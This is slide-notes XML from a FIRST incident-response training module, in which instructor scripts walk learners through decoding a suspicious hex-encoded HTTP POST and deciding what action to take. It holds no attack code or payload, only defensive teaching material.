                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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6018" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BA1ABFD-CE4C-C04C-8AF4-AA601A64EF52}"/>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1D2A776B-96E1-FB41-B815-39CE64E86C7B}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86019" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E8343B2-F289-2043-BFAC-D2B6925FEE62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4. You did have some “suspicious requests” reported from your Web servers exposed to the Internet for which there was no matching attack signature. You proceed to decode the HTTP header for the POST request, getting the output displayed below. What is going on here?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>learners respond.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Whenever you get a warning about an anomaly, you have to investigate. Sometimes the result is actionable and sometimes it leads to a dead end, but you must always pursue it. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The original HTTP post was displayed in hex. You had to decode it to be able to read it. Once it is decoded, you see the PHP program is being launched. You don’t know enough to make a conclusion as yet.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Conclusion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>At each step in your research you’ll want to ask “What else can I look at?” if you don’t yet have actionable information.</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endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86020" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{805E24E7-BAAA-5249-A09C-DA25AC0DF078}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{19E0E195-4713-C54D-814C-032ACA0D36F3}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86021" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44C502E0-E53A-1543-BF43-F9575F1929A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="6530975"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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8066" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3EB1D34-505C-B74A-8C6F-60F73F3C284E}"/>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4A6B0A5D-CC62-7E47-864A-78D652233BD0}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88067" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{025E9625-7817-8B4F-A1AA-DDD293DC1E65}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5592763" cy="64484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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>4. You did have some “suspicious requests” reported from your Web servers exposed to the Internet for which there was no matching attack signature. You proceed to decode the HTTP header for the POST request, getting the output displayed below. What is going on here?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="363"/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Let </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>learners respond.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Whenever you get a warning about an anomaly, you have to investigate. Sometimes the result is actionable and sometimes it leads to a dead end, but you must always pursue it. </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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Instructor notes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>The original HTTP post was displayed in hex. You had to decode it to be able to read it. Once it is decoded, you see the PHP program is being launched. You don’t know enough to make a conclusion as yet.</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Conclusion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>At each step in your research you’ll want to ask “What else can I look at?” if you don’t yet have actionable information.</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endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88068" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D65BCEE7-A501-2B4F-897B-E2413033D3C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{C349B106-F595-3E48-80B7-C2E197F0C112}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88069" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90BFB5A-8158-7242-B60A-F272FEEE27B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="6530975"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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0114" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{047B4A3C-9E2B-414D-8F7B-7E8B591CF931}"/>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B38D87CC-869D-404F-834F-AB9888E6EE92}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="DejaVu Sans" charset="0"/>
                <a:cs typeface="DejaVu Sans" charset="0"/>
              </a:rPr>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:ea typeface="DejaVu Sans" charset="0"/>
              <a:cs typeface="DejaVu Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97281" name="Text Box 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DD2F4F1-13FA-8444-AD96-A92B20961B2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631825" y="4343400"/>
            <a:ext cx="5799138" cy="6448425"/>
          </a:xfrm>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215900" indent="-214313" eaLnBrk="1">
              <a:spcBef>
                <a:spcPct val="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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Module 5 Lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" i="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>3 minutes</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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Combining these various bits of information, what are your conclusions? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Do you have any actionable information? If so, what action will you take? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="1" indent="-227013" eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buAutoNum type="arabicPeriod" startAt="6"/>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a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>If you worked for a national CSIRT, would your actions differ? If so, what actions would be different? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Let</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t> learners respond.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Say: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>It does seem there is something unusual going on here. Now that you have reviewed the payload, you do have actionable information – you can create an update to your servers to protect your organization. If you worked for a national CSIRT and it was your server, you would still investigate and develop an update. But you would also want to reach out to inform your constituency. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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b="1">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Conclusion: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US">
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>In walking through this example, you can see how investigation during the Analysis phase can transform non-actionable information into actionable information. And the overall goal of the 5-Part Process is to provide a structured procedure for developing incoming data into actionable information. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1">
              <a:spcBef>
                <a:spcPts val="1400"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>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endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90116" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF4A316F-B21E-ED49-B4BC-97A199CDC532}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6532563" y="8928100"/>
            <a:ext cx="325437"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p>
            <a:pPr algn="r" eaLnBrk="1">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{712BAAAE-38E4-AD44-8BED-BF7CF82F1E6F}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:pPr algn="r" eaLnBrk="1">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
                <a:buSzPct val="100000"/>
                <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:buNone/>
              </a:pPr>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="800">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Merriweather Sans" charset="0"/>
              <a:ea typeface="Merriweather Sans" charset="0"/>
              <a:cs typeface="Merriweather Sans" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90117" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57832D06-584C-6440-B2B2-89DCB05A3C27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="8928100"/>
            <a:ext cx="6530975"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00000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Merriweather Sans" charset="0"/>
                <a:ea typeface="Merriweather Sans" charset="0"/>
                <a:cs typeface="Merriweather Sans" charset="0"/>
              </a:rPr>
              <a:t>Incident Response Training Module 5: Research the Analysis Process, version 1.0, © 2017 FIRST</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2162" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E0F6D00-4533-1D46-9FF8-F7BB7EED0072}"/>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B82970E3-C090-7740-99E7-4317996E64A6}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
